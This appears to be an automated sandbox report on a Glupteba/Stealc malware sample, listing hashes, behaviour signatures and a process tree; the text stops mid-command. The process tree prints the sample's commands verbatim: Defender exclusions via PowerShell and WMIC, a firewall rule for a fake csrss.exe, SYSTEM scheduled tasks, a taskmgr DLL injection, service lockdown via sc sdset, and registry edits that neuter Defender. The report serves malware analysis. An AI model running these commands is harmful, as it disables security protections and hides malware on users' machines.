Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240412-en -
resource tags
-
submitted
23-04-2024 10:56
General
-
Target
97655f76dbd6e322aea5ecf9dcc82420ec25fb67c6fec0a6febbcd7e8b632e53.exe
-
Size
851KB
-
MD5
413a2ef652af005857952eaf1d717f72
-
SHA1
59d552791f8f7a915ca22ef20472237f93a82590
-
SHA256
97655f76dbd6e322aea5ecf9dcc82420ec25fb67c6fec0a6febbcd7e8b632e53
-
SHA512
016bb4bd52cd2f5debeed370ee366bc8f32573437b7cbfd2bc5f9fa904956d66dc100dd0aa2b8193b55238722aeec412e700ab675a87de91e3f9503f9bddf18c
-
SSDEEP
24576:SAQzZjtaG/wO8c4A9bSkhhizy5VdsWTdxS1yeA:+ZtaKw5s9bSsim5VmkQyv
Malware Config
Signatures
-
Glupteba
Glupteba is a modular loader written in Golang with various components.
-
Glupteba payload 11 IoCs
-
Modifies firewall policy service 2 TTPs 1 IoCs
-
Stealc
Stealc is an infostealer written in C++.
-
UAC bypass 3 TTPs 1 IoCs
-
Windows security bypass 2 TTPs 7 IoCs
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
-
Downloads MZ/PE file
-
Modifies Windows Firewall 2 TTPs 2 IoCs
-
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 5 IoCs
Looks up country code configured in the registry, likely geofence.
-
Drops startup file 8 IoCs
-
Executes dropped EXE 29 IoCs
-
Loads dropped DLL 11 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Themida packer 10 IoCs
Detects Themida, an advanced Windows software protection system.
-
UPX packed file 2 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Windows security modification 2 TTPs 8 IoCs
-
Adds Run key to start application 2 TTPs 3 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 3 IoCs
-
Drops Chrome extension 1 IoCs
-
Drops desktop.ini file(s) 1 IoCs
-
Enumerates connected drives 3 TTPs 4 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Manipulates WinMonFS driver. 1 IoCs
Roottkits write to WinMonFS to hide directories/files from being detected.
-
Drops file in System32 directory 31 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
-
Suspicious use of SetThreadContext 3 IoCs
-
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
-
Drops file in Program Files directory 6 IoCs
-
Drops file in Windows directory 10 IoCs
-
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 7 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 4 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies system certificate store 2 TTPs 6 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: MapViewOfSection 3 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 7 IoCs
-
Suspicious use of SendNotifyMessage 7 IoCs
-
Suspicious use of SetWindowsHookEx 5 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
System policy modification 1 TTPs 1 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\97655f76dbd6e322aea5ecf9dcc82420ec25fb67c6fec0a6febbcd7e8b632e53.exe"C:\Users\Admin\AppData\Local\Temp\97655f76dbd6e322aea5ecf9dcc82420ec25fb67c6fec0a6febbcd7e8b632e53.exe"1⤵
- UAC bypass
- Windows security bypass
- Checks computer location settings
- Windows security modification
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\iqie1xsg\iqie1xsg.cmdline"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3066.tmp" "c:\Users\Admin\AppData\Local\Temp\iqie1xsg\CSC68BBCB8EF05E46DDB5956FFCB8A1A125.TMP"3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\97655f76dbd6e322aea5ecf9dcc82420ec25fb67c6fec0a6febbcd7e8b632e53.exe" -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"2⤵
- Drops startup file
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Pictures\WqvUjjnPluYpb8wCHhD0buwD.exe"C:\Users\Admin\Pictures\WqvUjjnPluYpb8wCHhD0buwD.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\u310.0.exe"C:\Users\Admin\AppData\Local\Temp\u310.0.exe"4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2960 -s 8365⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\Qg_Appv5.exe"C:\Users\Admin\AppData\Local\Temp\Qg_Appv5.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeC:\Users\Admin\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeC:\Users\Admin\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe7⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe8⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\u310.1.exe"C:\Users\Admin\AppData\Local\Temp\u310.1.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD15⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3924 -s 15324⤵
- Program crash
-
C:\Users\Admin\Pictures\u3Xpyo3vzUEhiidl1YpyOYFX.exe"C:\Users\Admin\Pictures\u3Xpyo3vzUEhiidl1YpyOYFX.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\u3Xpyo3vzUEhiidl1YpyOYFX.exe"C:\Users\Admin\Pictures\u3Xpyo3vzUEhiidl1YpyOYFX.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes6⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\jZ93yVW3Sw1HMmqyFo0txVQs.exe"C:\Users\Admin\Pictures\jZ93yVW3Sw1HMmqyFo0txVQs.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\jZ93yVW3Sw1HMmqyFo0txVQs.exe"C:\Users\Admin\Pictures\jZ93yVW3Sw1HMmqyFo0txVQs.exe"4⤵
- Windows security bypass
- Executes dropped EXE
- Windows security modification
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes6⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe5⤵
- Executes dropped EXE
- Adds Run key to start application
- Manipulates WinMonFS driver.
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- Creates scheduled task(s)
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)7⤵
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)8⤵
- Launches sc.exe
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\HYGEKFd3yEB3UbFViv9Y0Trc.exe"C:\Users\Admin\Pictures\HYGEKFd3yEB3UbFViv9Y0Trc.exe" --silent --allusers=03⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Pictures\HYGEKFd3yEB3UbFViv9Y0Trc.exeC:\Users\Admin\Pictures\HYGEKFd3yEB3UbFViv9Y0Trc.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x298,0x29c,0x2a0,0x274,0x2a4,0x6f6be1d0,0x6f6be1dc,0x6f6be1e84⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\HYGEKFd3yEB3UbFViv9Y0Trc.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\HYGEKFd3yEB3UbFViv9Y0Trc.exe" --version4⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\Pictures\HYGEKFd3yEB3UbFViv9Y0Trc.exe"C:\Users\Admin\Pictures\HYGEKFd3yEB3UbFViv9Y0Trc.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=5904 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240423105714" --session-guid=1c41b407-1354-4cdd-b936-ade0c82f1ad9 --server-tracking-blob="YzE5MzM2Mzg5NTQzZTc5OWNiNzQ1MGM3MDMwMTRmNTAzMWNlOGJjMDNmNmUxMGQ4NzJlOTgzODFiNGY1ZDdhMTp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2N19fMTIzIiwic3lzdGVtIjp7InBsYXRmb3JtIjp7ImFyY2giOiJ4ODZfNjQiLCJvcHN5cyI6IldpbmRvd3MiLCJvcHN5cy12ZXJzaW9uIjoiMTAiLCJwYWNrYWdlIjoiRVhFIn19LCJ0aW1lc3RhbXAiOiIxNzEzODY5ODIxLjQzNzEiLCJ1dG0iOnsiY2FtcGFpZ24iOiI3NjdfXzEyMyIsIm1lZGl1bSI6ImFwYiIsInNvdXJjZSI6Im1rdCJ9LCJ1dWlkIjoiYTM2ZGJkZWEtNmU2ZS00NTkyLWFlOWItYjI5ZmY3MDkxZjIxIn0= " --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=18040000000000004⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
-
C:\Users\Admin\Pictures\HYGEKFd3yEB3UbFViv9Y0Trc.exeC:\Users\Admin\Pictures\HYGEKFd3yEB3UbFViv9Y0Trc.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x2a4,0x2a8,0x2ac,0x274,0x2b0,0x6e9be1d0,0x6e9be1dc,0x6e9be1e85⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404231057141\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404231057141\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404231057141\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404231057141\assistant\assistant_installer.exe" --version4⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404231057141\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404231057141\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0xb16038,0xb16044,0xb160505⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\Pictures\q5k45BSDMtuPVECVy92Za6sx.exe"C:\Users\Admin\Pictures\q5k45BSDMtuPVECVy92Za6sx.exe"3⤵
- Modifies firewall policy service
- Windows security bypass
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Windows security modification
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\GMDVAFhdraWmwojG4ZaXVULx.exe"C:\Users\Admin\Pictures\GMDVAFhdraWmwojG4ZaXVULx.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zSA4C.tmp\Install.exe.\Install.exe /nxdidQZJ "385118" /S4⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Enumerates system info in registry
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"5⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True8⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bWycNackLSywaqkmgR" /SC once /ST 10:59:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\wvHFkyC.exe\" em /TXsite_ideXx 385118 /S" /V1 /F5⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Users\Admin\Pictures\pTIeeGktFcspxqBbIxYj6WOZ.exe"C:\Users\Admin\Pictures\pTIeeGktFcspxqBbIxYj6WOZ.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS6712.tmp\Install.exe.\Install.exe /nxdidQZJ "385118" /S4⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Enumerates system info in registry
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"5⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True8⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bWycNackLSywaqkmgR" /SC once /ST 10:59:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\ZuOhtzR.exe\" em /GJsite_idLAU 385118 /S" /V1 /F5⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 2960 -ip 29601⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 3924 -ip 39241⤵
-
C:\Windows\windefender.exeC:\Windows\windefender.exe1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\ZuOhtzR.exeC:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\ZuOhtzR.exe em /GJsite_idLAU 385118 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD 